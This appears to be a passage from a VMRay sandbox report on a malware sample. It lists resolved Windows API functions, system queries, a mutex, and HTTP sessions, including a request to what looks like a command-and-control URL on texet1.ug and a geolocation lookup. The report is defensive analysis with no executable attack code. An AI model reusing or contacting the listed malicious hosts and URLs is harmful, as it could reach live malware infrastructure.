Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x779bdf14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x779bca64 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x779bca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x779be124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x779c157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x779bdf36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x779c14d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x779c469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x779bdf66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x779d7144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x779c468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x779bdf4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x779d779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x779bc532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x779c2a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x779c46ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x779c369c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x76df17bf True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x76dee141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x76d79ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76fa7078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x76d81e46 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x762fb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x76307259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x763286d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x76329d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x76b8fd6b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x76b84642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x76b83eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x76b83ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x76b83e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x76b83f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x76b85dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x76b84af8 True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x74189263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x76c3b131 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x76c3311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x76c47673 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x7412572c True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x7411436b True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x75f55d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x758ec544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75e24d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x75ea410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x75ea4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x75e2d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x75e3ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x77e9441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ebc50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x77ebc381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x75e3f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x77ea05d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x77ebca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77e70b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x77f2fde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77ec1e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x75ea4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x75e9cd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x75ea424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x75ea46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x75eb6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x75ea4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x75eb65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x75ea47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x75ea47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x75ea47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x75e3eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x77e21544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x77e21408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x77e2152c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76de5708 True 58
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create LPCWSTRszTitle class_name = LPCWSTRszWindowClass, wndproc_parameter = 0 True 1
Fn
System (9)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 1
Fn
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Get Time type = System Time, time = 2019-07-08 06:48:45 (UTC) True 1
Fn
Get Time type = Ticks, time = 16738 True 1
Fn
Get Time type = Performance Ctr, time = 6295398422 True 1
Fn
Get Time type = System Time, time = 2019-07-08 06:48:53 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 6837357294 True 1
Fn
Get Info type = Operating System True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (2)
»
Information Value
Total Data Sent 631 bytes
Total Data Received 7.47 KB
Contacted Host Count 2
Contacted Hosts 77.123.139.189, 185.162.131.70
HTTP Session #1
»
Information Value
User Agent Microsoft Internet Explorer
Server Name texet1.ug
Server Port 80
Username -
Password -
Data Sent 164 bytes
Data Received 285 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = texet1.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /AJShduiwtyt7858345iasd43/AJshd78458hIsdfSdf/get.php True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://texet1.ug/AJShduiwtyt7858345iasd43/AJshd78458hIsdfSdf/get.php?pid=711BCE0E5BC884176929A7862BF0A291 True 1
Fn
Read Response size = 1024, size_out = 103 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #2
»
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.19 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 465 True 1
Fn
Data
Close Session - True 1
Fn
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image